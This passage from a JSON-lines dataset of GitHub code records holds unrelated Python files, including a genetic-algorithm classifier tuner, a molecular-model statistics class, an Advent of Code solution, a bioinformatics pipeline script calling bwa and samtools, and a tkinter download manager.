test_get_published_time_with_pt(self):\n\t\tpt = parser.get_published_time(market)\n\t\tassert pt == 1493129993643\n\n\tdef test_get_published_time_no_pt(self):\n\t\twith 
pytest.raises(InvalidMarket):\n\t\t\tparser.get_published_time({})\n","repo_name":"petermclagan/betfair-historical","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"9344116934","text":"import random\nimport time\n\nimport pandas as pd\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom sklearn import model_selection\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom SVC_classifier import mutationSVC, SVCParametersFitness, SVCParameters\nfrom KNeighborsClassifier_classifier import mutationKNeighborsClassifier, KNeighborsClassifierParametersFitness,\\\n KNeighborsClassifierParameters\nfrom MLPClassifier_classifier import mutationMLPClassifier, MLPClassifierParametersFitness, MLPClassifierParameters\nfrom GaussianProcessClassifier_classifier import mutationGaussianProcessClassifier,\\\n GaussianProcessClassifierParametersFitness, GaussianProcessClassifierParameters\nfrom DecisionTreeClassifier_classifier import mutationDecisionTreeClassifier, DecisionTreeClassifierParametersFitness,\\\n DecisionTreeClassifierParameters\nfrom RandomForestClassifier_classifier import mutationRandomForestClassifier, RandomForestClassifierParametersFitness,\\\n RandomForestClassifierParameters\nfrom plots import make_plots\n\n\ndef main():\n pd.set_option('display.max_columns', None)\n # df = pd.read_csv(\"project04/data.csv\", sep=';') # for Visual Studio Code\n df = pd.read_csv(\"data.csv\", sep=';') # for PyCharm\n y = df['status']\n df.drop('status', axis=1, inplace=True)\n numberOfAtributtes = 
len(df.columns)\n\n mms = MinMaxScaler()\n df_norm = mms.fit_transform(df)\n # -----------classifier-1-------------------------------\n # clf = SVC()\n # clf = KNeighborsClassifier()\n # clf = MLPClassifier()\n # clf = GaussianProcessClassifier()\n # clf = DecisionTreeClassifier()\n clf = RandomForestClassifier()\n\n # -----------classifier-1-------------------------------\n scores = model_selection.cross_val_score(clf, df_norm, y, cv=5, scoring='accuracy', n_jobs=-1)\n print(scores.mean())\n\n creator.create(\"FitnessMax\", base.Fitness, weights=(-1.0,))\n creator.create(\"Individual\", list, fitness=creator.FitnessMax)\n toolbox = base.Toolbox()\n\n # generowanie nowych osobników\n # -----------classifier-2-------------------------------\n # toolbox.register('individual', SVCParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', KNeighborsClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', MLPClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', GaussianProcessClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', DecisionTreeClassifierParameters, numberOfAtributtes, creator.Individual)\n toolbox.register('individual', RandomForestClassifierParameters, numberOfAtributtes, creator.Individual)\n # -----------classifier-2-------------------------------\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\n # wskazanie funkcji celu\n # -----------classifier-3-------------------------------\n # toolbox.register(\"evaluate\", SVCParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", KNeighborsClassifierParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", MLPClassifierParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", GaussianProcessClassifierParametersFitness, y, df, numberOfAtributtes)\n # 
toolbox.register(\"evaluate\", DecisionTreeClassifierParametersFitness, y, df, numberOfAtributtes)\n toolbox.register(\"evaluate\", RandomForestClassifierParametersFitness, y, df, numberOfAtributtes)\n # -----------classifier-3-------------------------------\n\n # wybieranie algorytmu selekcji\n # toolbox.register(\"select\", tools.selTournament, tournsize=3)\n # toolbox.register(\"select\", tools.selRandom)\n # toolbox.register(\"select\", tools.selBest)\n # toolbox.register(\"select\", tools.selWorst)\n toolbox.register(\"select\", tools.selRoulette)\n\n # krzyżowanie dla binarnej reprezentacji\n # toolbox.register(\"mate\", tools.cxOnePoint)\n # toolbox.register(\"mate\", tools.cxUniform)\n toolbox.register(\"mate\", tools.cxTwoPoint)\n\n # definicja algorytmu mutacji\n # -----------classifier-4-------------------------------\n # toolbox.register(\"mutate\", mutationSVC)\n # toolbox.register(\"mutate\", mutationKNeighborsClassifier)\n # toolbox.register(\"mutate\", mutationMLPClassifier)\n # toolbox.register(\"mutate\", mutationGaussianProcessClassifier)\n # toolbox.register(\"mutate\", mutationDecisionTreeClassifier)\n toolbox.register(\"mutate\", mutationRandomForestClassifier)\n # -----------classifier-4-------------------------------\n\n # konfiguracja parametów algorytmu genetycznego\n sizePopulation = 100\n probabilityMutation = 0.6\n probabilityCrossover = 0.8\n numberIteration = 10 # <- było 300\n # generujemy początkową populację i obliczamy jej wartość funkcji dopasowania\n pop = toolbox.population(n=sizePopulation)\n\n fitnesses = list(map(toolbox.evaluate, pop))\n for ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\n\n # pętla genetyczna\n g = 0\n numberElitism = 1\n all_best_inds = []\n all_fits = []\n\n start_time = time.time()\n while g < numberIteration:\n g = g + 1\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n 
offspring = list(map(toolbox.clone, offspring))\n\n listElitism = []\n for x in range(0, numberElitism):\n listElitism.append(tools.selWorst(pop, 1)[0])\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n\n # cross two individuals with probability CXPB\n if random.random() < probabilityCrossover:\n # toolbox.mate(child1, child2, probabilityCrossover)\n toolbox.mate(child1, child2)\n\n # fitness values of the children\n # must be recalculated later\n del child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n # mutate an individual with probability MUTPB\n if random.random() < probabilityMutation:\n # toolbox.mutate(mutant, probabilityMutation)\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n pop[:] = offspring + listElitism\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x * x for x in fits)\n std = abs(sum2 / length - mean ** 2) ** 0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n best_ind = tools.selWorst(pop, 1)[0]\n # -----------classifier-5-------------------------------\n # all_best_inds.append(SVCParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(KNeighborsClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(MLPClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(GaussianProcessClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # 
all_best_inds.append(DecisionTreeClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n all_best_inds.append(RandomForestClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # -----------classifier-5-------------------------------\n all_fits.append(fits)\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n\n print(\"-- End of (successful) evolution --\")\n end_time = time.time()\n print(f'Evolution time: {end_time - start_time} [ms]')\n make_plots(all_best_inds, all_fits)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jeremiaszmacura/PK-classical-evolution-algorithm","sub_path":"project04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70287183172","text":"import random\nimport scipy.stats as sps\n\nimport numpy as np\nimport torch\nfrom rdkit import Chem\nfrom reinvent_chemistry.library_design import BondMaker, AttachmentPoints\n\nfrom models.actions.calculate_nlls_from_model import CalculateNLLsFromModel\nfrom models.actions.sample_model import SampleModel\n\n\nclass CollectStatsFromModel:\n \"\"\"Collects stats from an existing RNN model.\"\"\"\n\n def __init__(self, model, epoch, training_set, validation_set, sample_size,\n decoration_type=\"all\", with_weights=False, other_values=None):\n \"\"\"\n Creates an instance of CollectStatsFromModel.\n : param model: A model instance initialized as sampling_mode.\n : param epoch: Epoch number to be sampled(informative purposes).\n : param training_set: Iterator with the training set.\n : param validation_set: Iterator with the validation set.\n : param writer: Writer object(Tensorboard writer).\n : param other_values: Other values to save for the epoch.\n : param sample_size: Number of molecules to sample from the training / validation / sample set.\n : param decoration_type: Kind of decorations (single or all).\n : param 
with_weights: To calculate or not the weights.\n : return:\n \"\"\"\n\n self.model = model\n self.epoch = epoch\n self.sample_size = sample_size\n self.training_set = training_set\n self.validation_set = validation_set\n self.other_values = other_values\n\n self.decoration_type = decoration_type\n self.with_weights = with_weights\n self.sample_size = max(sample_size, 1)\n\n self._bond_maker = BondMaker()\n self._attachment_points = AttachmentPoints()\n self._calc_nlls_action = CalculateNLLsFromModel(self.model, 128)\n self._sample_model_action = SampleModel(self.model, 128)\n\n @torch.no_grad()\n def run(self):\n \"\"\"\n Collects stats for a specific model object, epoch, validation set, training set and writer object.\n : return: A dictionary with all the data saved for that given epoch.\n \"\"\"\n data = {}\n sliced_training_set = list(random.sample(self.training_set, self.sample_size))\n sliced_validation_set = list(random.sample(self.validation_set, self.sample_size))\n\n sampled_training_mols, sampled_training_nlls = self._sample_decorations(next(zip(*sliced_training_set)))\n sampled_validation_mols, sampled_validation_nlls = self._sample_decorations(next(zip(*sliced_validation_set)))\n\n training_nlls = np.array(list(self._calc_nlls_action.run(sliced_training_set)))\n validation_nlls = np.array(list(self._calc_nlls_action.run(sliced_validation_set)))\n\n data.update({\"sampled_training_mols\": sampled_training_mols, \"sampled_validation_mols\": sampled_validation_mols,\n \"training_nlls\": training_nlls, \"validation_nlls\": validation_nlls,\n \"binned_jsd\": self.jsd([sampled_training_nlls, sampled_validation_nlls,\n training_nlls, validation_nlls], binned=True),\n \"unbinned_jsd\": self.jsd([sampled_training_nlls, sampled_validation_nlls,\n training_nlls, validation_nlls], binned=False)\n })\n return data\n\n def _sample_decorations(self, scaffold_list):\n mols = []\n nlls = []\n for scaff, decoration, nll in self._sample_model_action.run(scaffold_list):\n 
labeled_scaffold = self._attachment_points.add_attachment_point_numbers(scaff, canonicalize=False)\n molecule = self._bond_maker.join_scaffolds_and_decorations(labeled_scaffold, decoration)\n if molecule:\n mols.append(Chem.MolToSmiles(molecule))\n nlls.append(nll)\n return mols, np.array(nlls)\n\n def bin_dist(self, dist, bins=1000, dist_range=(0, 100)):\n bins = np.histogram(dist, bins=bins, range=dist_range, density=False)[0]\n bins[bins == 0] = 1\n return bins / bins.sum()\n\n def jsd(self, dists, binned=False):\n min_size = min(len(dist) for dist in dists)\n dists = [dist[:min_size] for dist in dists]\n if binned:\n dists = [self.bin_dist(dist) for dist in dists]\n num_dists = len(dists)\n avg_dist = np.sum(dists, axis=0) / num_dists\n return sum((sps.entropy(dist, avg_dist) for dist in dists)) / num_dists\n","repo_name":"MolecularAI/Lib-INVENT","sub_path":"models/actions/collect_stats_from_model.py","file_name":"collect_stats_from_model.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"44"} +{"seq_id":"73097555652","text":"with open('day6input') as f:\n groups = f.read().split(\"\\n\\n\")\n\n# Part One\nsum = 0\nfor group in groups:\n l = list()\n group = group.replace('\\n', '')\n count = len(set([c for c in group])) # by creating a set we eliminate all duplicates. The len of that is our count\n sum += count\n\nprint(sum)\n\n# Part Two\nsum = 0\nfor group in groups:\n l = list()\n group = group.split(\"\\n\")\n groupset = set(group[0]) # first \"groupset\" needs to be the set of the first person\n for person in group:\n personset = set([c for c in person])\n groupset = groupset & personset # now we can use the intersection set operation on the group and person set\n sum += len(groupset) # and only questions to which everyone answered \"yes\" are add to our final\n # groupset. 
Now we can sum up the counts\nprint(sum)","repo_name":"blanks-hub/MyAdventOfCode2020","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35457372121","text":"import sys,getopt,re,os\r\nimport pandas as pd\r\ndef build_table_single(this_inf,thisfh,this_pd):\r\n\tcontent_list=this_inf.readlines()\r\n\tfor j in range(1,len(content_list)-1):\r\n\t\tline=content_list[j]\r\n\t\tline_list=line.split(\"\\t\")\r\n\t\tread_tag=line_list[0]\r\n\t\tflag=int(line_list[1])\r\n\t\ttag=line_list[2]\r\n\t\tpos=line_list[3]\r\n\t\tcigar=line_list[5]\r\n\t\tmrnm=line_list[6]\r\n\t\tread_seq=line_list[9]\r\n\t\tread_qual=line_list[10]\r\n\t\ttotal_l=0\r\n\t\tflist=re.findall(\"\\d+\\S\",cigar)\r\n\t\tfor s in flist:\r\n\t\t\tmobjx=re.match(\"(\\d+)(\\S)\",s)\r\n\t\t\tm1=mobjx.group(1)\r\n\t\t\tS1=mobjx.group(2)\r\n\t\t\tif S1!=\"M\":\r\n\t\t\t\ttotal_l+=int(m1)\r\n\t\t\telse:\r\n\t\t\t\tml=int(m1)\r\n\t\t\t\tbreak\r\n\t\tif ml>=50:\r\n\t\t\tmobj1=re.match(\"(.*)_(\\d+)_(\\d+)\",read_tag)\r\n\t\t\tchr_tag=mobj1.group(1)\r\n\t\t\tchr_start=int(mobj1.group(2))+total_l\r\n\t\t\tchr_end=chr_start+ml-1\r\n\t\t\tspe_name=this_pd.loc[tag,'species_name']\r\n\t\t\tstrain_name=this_pd.loc[tag,'strain_name']\r\n\t\t\ttarget_start=int(pos)+total_l\r\n\t\t\ttarget_end=target_start+ml-1\r\n\t\t\tprint(chr_tag+\"\\t\"+str(chr_start)+\"\\t\"+str(chr_end)+\"\\t\"+tag+\"\\t\"+str(target_start)+\"\\t\"+str(target_end)+\"\\t\"+spe_name+\"\\t\"+str(strain_name),file=thisfh)\r\n\t\t\t# try:\r\n\t\t\t\t# print(chr_tag+\"\\t\"+str(chr_start)+\"\\t\"+str(chr_end)+\"\\t\"+tag+\"\\t\"+str(target_start)+\"\\t\"+str(target_end)+\"\\t\"+spe_name+\"\\t\"+strain_name,file=thisfh)\r\n\t\t\t# except:\r\n\t\t\t\t# print(type(chr_start),type(chr_end),type(target_start),type(target_end))\r\n\t\t\t\t# sys.exit()\r\nhelp_str='HGTFinder.py -g -o 
'\r\ngenomefile=''\r\noutfolder=''\r\nvirus_bwa_ref='/home/hzhu/db/virus_refseq/virus_refseq_idx'\r\nbac_bwa_ref_list=[]\r\nfor i in range(10):\r\n\tbac_bwa_ref_list.append('/home/hzhu/db/bac_refseq_db/'+'bac'+str(i+1)+'_idx')\r\ntry:\r\n\topts,args=getopt.getopt(sys.argv[1:],\"hg:o:\",[\"help\"])\r\nexcept getopt.GetoptError:\r\n\tprint (help_str)\r\n\tsys.exit(2)\r\nfor opt,value in opts:\r\n\tif opt in (\"-h\",\"--help\"):\r\n\t\tprint (help_str)\r\n\t\tsys.exit()\r\n\tif opt in (\"-o\"):\r\n\t\toutfolder=value\r\n\tif opt in (\"-g\"):\r\n\t\tgenomefile=value\r\n\r\nif not(outfolder and genomefile):\r\n\tprint (help_str)\r\n\tsys.exit()\r\nelse:\r\n\tvirus_outfolder=outfolder+'/virus'\r\n\tbac_outfolder=outfolder+'/bac'\r\n\tbac_combine_outfolder=bac_outfolder+'/bac_combine'\r\n\treadsfile=outfolder+\"/shreddered.fq\"\r\n\t\r\n\tos.system('mkdir '+ outfolder)\r\n\tos.system('mkdir '+ virus_outfolder)\r\n\tos.system('mkdir '+ bac_outfolder)\r\n\tos.system('mkdir '+ bac_combine_outfolder)\r\n\tos.system('mkdir '+ bac_combine_outfolder+'/virus_reads')\r\n##############reads produce################\r\nif \"shreddered.fq\" not in os.listdir(outfolder):\r\n\tos.system(\"python ~/tools/HGTFinder/HGT_reads_produce.py \"+genomefile+\" \"+outfolder)\r\n#########################################\r\nvirus_desc=virus_bwa_ref+'.des'\r\nvpd=pd.read_csv(virus_desc,sep=\"\\t\",index_col=0)\r\ntlistdir=os.listdir(virus_outfolder)\r\nsamfile=virus_outfolder+'/virus.sam'\r\noutfile=virus_outfolder+'/virus_HGT.tab'\r\nif \"virus.sam\" not in tlistdir:\r\n\tcmd=r\"bwa mem -t 20 \"+virus_bwa_ref+\" \"+readsfile+r\" | samtools view -F 4 -o \"+samfile\r\n\tprint(cmd)\r\n\tos.system(cmd)\r\nelse:\r\n\tprint(\"virus.sam already in \"+ virus_outfolder+\", 
skip\")\r\ninf=open(samfile)\r\noutfh=open(outfile,\"w\")\r\nbuild_table_single(inf,outfh,vpd)\r\ninf.close()\r\noutfh.close()\r\n##########################################\r\ncombine_count=bac_combine_outfolder+'/bac_HGT_combine.tab'\r\nfor i in range(10):\r\n\tthis_bac_outfolder=bac_outfolder+'/bac'+str(i+1)\r\n\tthis_sam=this_bac_outfolder+'/bac.sam'\r\n\tthis_outfile=this_bac_outfolder+'/bac_HGT.tab'\r\n\tcpd=pd.read_csv(bac_bwa_ref_list[i]+'.des',sep=\"\\t\",index_col=0)\r\n\tif not os.path.exists(this_bac_outfolder):\r\n\t\tos.system(\"mkdir \"+this_bac_outfolder)\r\n\tif 'bac.sam' not in os.listdir(this_bac_outfolder):\r\n\t\tbac_cmd=r\"bwa mem -t 20 \"+bac_bwa_ref_list[i]+\" \"+readsfile+r\" | samtools view -F 4 -o \"+this_sam\r\n\t\tprint(bac_cmd)\r\n\t\tos.system(bac_cmd)\r\n\telse:\r\n\t\tprint(\"bac.sam already in \"+ this_bac_outfolder+\", skip\")\r\n\tif \"bac_HGT.tab\" not in this_bac_outfolder:\r\n\t\tinf=open(this_sam)\r\n\t\toutfh=open(this_outfile,\"w\")\r\n\t\tbuild_table_single(inf,outfh,cpd)\r\n\t\tinf.close()\r\n\t\toutfh.close()\r\n\telse:\r\n\t\tprint(\"bac_HGT.tab already in \"+this_bac_outfolder+\", skip\")\r\n\tcombine_cmd=\"cat \"+this_outfile+\" >> \"+combine_count\r\n\tprint(combine_cmd)\r\n\tos.system(combine_cmd)\r\nmodified_combine_count=combine_count+'.mod'\r\nmerge_cmd=\"python ~/tools/HGTFinder/HGT_tab_merge.py \"+combine_count+\" \"+modified_combine_count\r\nprint(merge_cmd)\r\nos.system(merge_cmd)","repo_name":"weibozheng/Horizontal-Gene-Transfer","sub_path":"HGTFinder.py","file_name":"HGTFinder.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7299789046","text":"import time\nfrom tkinter import (Tk, DISABLED, NORMAL, Frame, SUNKEN, TOP, BOTH, GROOVE,\n LabelFrame)\nfrom tkinter import (font, StringVar, Label, Button, X, RIDGE, Entry, LEFT, W,\n HORIZONTAL)\nimport tkinter.ttk as ttk\nfrom pySmartDL import SmartDL\nimport 
threading\nimport os\nfrom PIL import ImageTk, Image\nimport sys\n\ncwd = os.path.dirname(os.path.realpath(__file__))\n\n\nclass AlDownloadManager():\n\n def __init__(self):\n root = Tk(className=\" ALDOWNLOADMANAGER \")\n root.geometry(\"700x360+1200+635\")\n root.resizable(0, 0)\n iconPath = os.path.join(cwd+'\\\\UI\\\\icons',\n 'aldownloadmanager.ico')\n root.iconbitmap(iconPath)\n root.config(bg=\"#ffffff\")\n self.defaultColor = ''\n self.isPaused = False\n self.downloadObject = ''\n self.inputLink = StringVar()\n self.statusMessage = StringVar()\n self.speedMessage = StringVar()\n self.destinationMessage = StringVar()\n self.sizeMessage = StringVar()\n self.timeMessage = StringVar()\n textHighlightFont = font.Font(family='OnePlus Sans Display', size=15,\n weight='bold')\n appHighlightFont = font.Font(family='OnePlus Sans Display', size=12,\n weight='bold')\n textFont = font.Font(family='OnePlus Sans Text', size=10,\n weight='bold')\n self.destination = os.path.join(cwd, 'AlDownloadManager')\n root.overrideredirect(1)\n\n def liftWindow():\n root.lift()\n root.after(1000, liftWindow)\n\n def callback(event):\n root.geometry(\"700x360+1200+635\")\n\n def showScreen(event):\n root.deiconify()\n root.overrideredirect(1)\n\n def screenAppear(event):\n root.overrideredirect(1)\n\n def hideScreen():\n root.overrideredirect(0)\n root.iconify()\n\n def terminate(object):\n if object:\n object.stop()\n pauseButton['state'] = DISABLED\n stopButton['text'] = 'STOP'\n stopButton['state'] = DISABLED\n stopButton['bg'] = self.defaultColor\n pauseButton['text'] = \"PAUSE\"\n downloadButton['state'] = NORMAL\n\n def pauseResume(object):\n if self.isPaused:\n object.resume()\n pauseButton['text'] = \"PAUSE\"\n pauseButton['fg'] = \"white\"\n pauseButton.flash()\n self.isPaused = not self.isPaused\n else:\n object.pause()\n pauseButton['text'] = \"RESUME\"\n pauseButton['fg'] = \"white\"\n pauseButton.flash()\n self.isPaused = not self.isPaused\n\n def download(__url__):\n url 
= __url__\n self.destination = str(self.destination)\n stopButton['command'] = lambda: terminate(self.downloadObject)\n stopButton['state'] = NORMAL\n pauseButton['command'] = lambda: pauseResume(self.downloadObject)\n pauseButton['state'] = NORMAL\n\n def doDownload(sem):\n with sem:\n try:\n if self.downloadObject:\n self.downloadObject.start()\n except Exception as e:\n print(f\"------> {e}\")\n print(f\"obj err--> {self.downloadObject.get_errors()}\")\n self.statusMessage.set(f\" Status: {e}\")\n root.update_idletasks()\n\n def showProgress(sem):\n with sem:\n time.sleep(1)\n startTime = time.perf_counter()\n if self.downloadObject:\n while not (self.downloadObject.isFinished() and\n len(self.downloadObject.get_errors())) == 0:\n obj = self.downloadObject\n sts = obj.get_status().capitalize()\n speed = obj.get_speed(human=True)\n self.statusMessage.set(f\" Status: {sts}\")\n self.speedMessage.set(f\" Speed: {speed}\")\n self.destinationMessage.set(\" Working directory:\"\n f\" {self.destination}\")\n dwnld = obj.get_dl_size(human=True)\n self.sizeMessage.set(\" Downloaded so far: \"\n f\"{dwnld}\")\n elpsdTm = round(time.perf_counter() - startTime, 1)\n self.timeMessage.set(f\" Elapsed Time: {elpsdTm}\"\n if sts != 'Paused'\n else ' Elapsed Time: . . 
.')\n prgrs = obj.get_progress()\n progress['value'] = 100 * prgrs\n time.sleep(0.2)\n root.update_idletasks()\n if len(self.downloadObject.get_errors()) == 0:\n startPoint = time.perf_counter()\n while time.perf_counter() - startPoint < 2:\n obj = self.downloadObject\n sts = obj.get_status().capitalize()\n speed = obj.get_speed(human=True)\n self.statusMessage.set(f\" Status: {sts}\")\n self.speedMessage.set(f\" Speed: {speed}\")\n dest = obj.get_dest()\n self.destinationMessage.set(\" Saved at: \"\n f\"{dest}\")\n size = obj.get_final_filesize(human=True)\n self.sizeMessage.set(\" Total File Size: \"\n f\"{size}\")\n tmMsg = str(obj.get_dl_time(human=True))\n self.timeMessage.set(f\" Total Time: {tmMsg}\")\n prgrs = obj.get_progress()\n progress['value'] = 100 * prgrs\n time.sleep(0.2)\n root.update_idletasks()\n if progress['value'] == 100:\n print('File Downloaded')\n else:\n self.statusMessage.set(\" Status: Download \" +\n \"Failed\")\n obj = self.downloadObject\n speed = obj.get_errors()[0]\n self.speedMessage.set(f\" Reason: {speed}\")\n root.update_idletasks()\n print('Download Failed')\n\n if len(url) == 0:\n downloadButton.flash()\n else:\n try:\n self.downloadObject = SmartDL(url, self.destination)\n except Exception as e:\n print(f\"Error in {e}\")\n self.statusMessage.set(f\" Status: {e}\")\n root.update_idletasks()\n semaphore = threading.Semaphore(2)\n threading.Thread(target=doDownload, args=(semaphore,)).start()\n threading.Thread(target=showProgress,\n args=(semaphore,)).start()\n\n def clearReset():\n self.inputLink.set('')\n terminate(self.downloadObject)\n downloadButton['state'] = NORMAL\n\n def startDownloading():\n link = entryLink.get()\n if link != '':\n download(link)\n downloadButton.flash()\n downloadButton['state'] = DISABLED\n self.defaultColor = stopButton.cget('background')\n else:\n downloadButton.flash()\n\n titleBar = Frame(root, bg='#141414', relief=SUNKEN, bd=0)\n icon = Image.open(iconPath)\n icon = icon.resize((30, 30), 
Image.ANTIALIAS)\n icon = ImageTk.PhotoImage(icon)\n iconLabel = Label(titleBar, image=icon)\n iconLabel.photo = icon\n iconLabel.config(bg='#141414')\n iconLabel.grid(row=0, column=0, sticky=\"nsew\")\n titleLabel = Label(titleBar, text='ALDOWNLOADMANAGER', fg='#909090',\n bg='#141414', font=appHighlightFont)\n titleLabel.grid(row=0, column=1, sticky=\"nsew\")\n closeButton = Button(titleBar, text=\"x\", bg='#141414', fg=\"#909090\",\n borderwidth=0, command=root.destroy,\n font=appHighlightFont)\n closeButton.grid(row=0, column=3, sticky=\"nsew\")\n minimizeButton = Button(titleBar, text=\"-\", bg='#141414', fg=\"#909090\",\n borderwidth=0, command=hideScreen,\n font=appHighlightFont)\n minimizeButton.grid(row=0, column=2, sticky=\"nsew\")\n titleBar.grid_columnconfigure(0, weight=1)\n titleBar.grid_columnconfigure(1, weight=75)\n titleBar.grid_columnconfigure(2, weight=1)\n titleBar.grid_columnconfigure(3, weight=1)\n titleBar.pack(side=TOP, fill=X)\n\n frameInput = Frame(root, relief=RIDGE, borderwidth=0, bg='#333c4e')\n frameInput.pack(fill=BOTH, expand=1)\n\n frameStatus = LabelFrame(root, text=\" Information------------------\" +\n \"------------------------------------------\" +\n \"----------------------\", relief=SUNKEN,\n bg='#16a4fa', borderwidth=0,\n font=textHighlightFont, fg='white')\n frameStatus.pack(fill=BOTH, expand=1)\n\n frameProgress = Frame(root, relief=GROOVE, borderwidth=0, bg='white')\n frameProgress.pack(fill=BOTH, expand=1)\n\n frameAction = Frame(root, relief=GROOVE, borderwidth=0, bg='white')\n frameAction.pack(fill=BOTH, expand=1)\n\n labelLink = Label(frameInput, text=\"Enter URL\", font=textHighlightFont,\n bg='#333c4e', fg='#9cabc4')\n labelLink.pack(fill=X)\n entryLink = Entry(frameInput, textvariable=self.inputLink,\n font=textFont)\n entryLink.pack(fill=X, expand=1, side=LEFT, padx=10, pady=5)\n\n labelStatus = Label(frameStatus, textvariable=self.statusMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n 
labelStatus.grid(row=1, column=0, sticky=W)\n labelSpeed = Label(frameStatus, textvariable=self.speedMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelSpeed.grid(row=2, column=0, sticky=W)\n labelSize = Label(frameStatus, textvariable=self.sizeMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelSize.grid(row=3, column=0, sticky=W)\n labelTime = Label(frameStatus, textvariable=self.timeMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelTime.grid(row=4, column=0, sticky=W)\n labelDestination = Label(frameStatus,\n textvariable=self.destinationMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelDestination.grid(row=5, column=0, sticky=W)\n\n style = ttk.Style()\n style.theme_use('clam')\n style.configure(\"bar.Horizontal.TProgressbar\", troughcolor='white',\n bordercolor='#16a4fa', background='#16a4fa',\n lightcolor='#16a4fa', darkcolor='#16a4fa')\n progress = ttk.Progressbar(frameProgress,\n style=\"bar.Horizontal.TProgressbar\",\n orient=HORIZONTAL, length=700,\n mode='determinate')\n progress.pack(fill=X, expand=1, padx=10, pady=7)\n\n downloadButton = Button(frameAction, text=\"DOWNLOAD\",\n command=lambda: startDownloading(), width=16,\n height=2, fg=\"white\", bd=0, bg='#16a4fa',\n font=textFont)\n downloadButton.grid(row=1, column=1, padx=20)\n pauseButton = Button(frameAction, state=DISABLED, text=\"PAUSE\",\n width=16, height=2, fg=\"white\", bd=0,\n bg='#16a4fa', font=textFont)\n pauseButton.grid(row=1, column=2, padx=20)\n stopButton = Button(frameAction, state=DISABLED, text=\"STOP\", width=16,\n height=2, fg=\"white\", bd=0, bg='#16a4fa',\n font=textFont)\n stopButton.grid(row=1, column=3, padx=20)\n clearButton = Button(frameAction, text=\"CLEAR\",\n command=lambda: clearReset(), width=16, height=2,\n fg=\"white\", bd=0, bg='#16a4fa', font=textFont)\n clearButton.grid(row=1, column=4, padx=20)\n\n titleBar.bind(\"\", callback)\n titleBar.bind(\"\", 
showScreen)\n titleBar.bind(\"\", screenAppear)\n\n liftWindow()\n root.mainloop()\n root.quit()\n\n\nif __name__ == \"__main__\":\n AlDownloadManager()\n sys.exit()\n","repo_name":"alankarartist/ALDOWNLOADMANAGER","sub_path":"AlDownloadManager.py","file_name":"AlDownloadManager.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30619272617","text":"#!/usr/bin/python\n\n'''\nA command line tool for processing usage files.\n'''\n\n\nimport argparse\nimport gzip\nimport json\nimport os\nfrom os import path\nimport urllib2\nimport logging\nimport shutil\n\n\nlog = logging.getLogger(__name__)\n\n\n\ndef get_processed_files(state_path):\n if path.exists(state_path):\n with open(state_path) as fle:\n return set((item.strip() for item in fle))\n else:\n log.debug('\\nstate-file: %s does not exist, will create it\\n', state_path)\n return set()\n\n\ndef get_unprocessed_files(source_dir, state_path):\n processed_files = get_processed_files(state_path)\n\n for root, _, files in os.walk(source_dir, topdown=False):\n for fle in files:\n name, ext = path.splitext(fle)\n\n if ext == '.gz':\n if fle not in 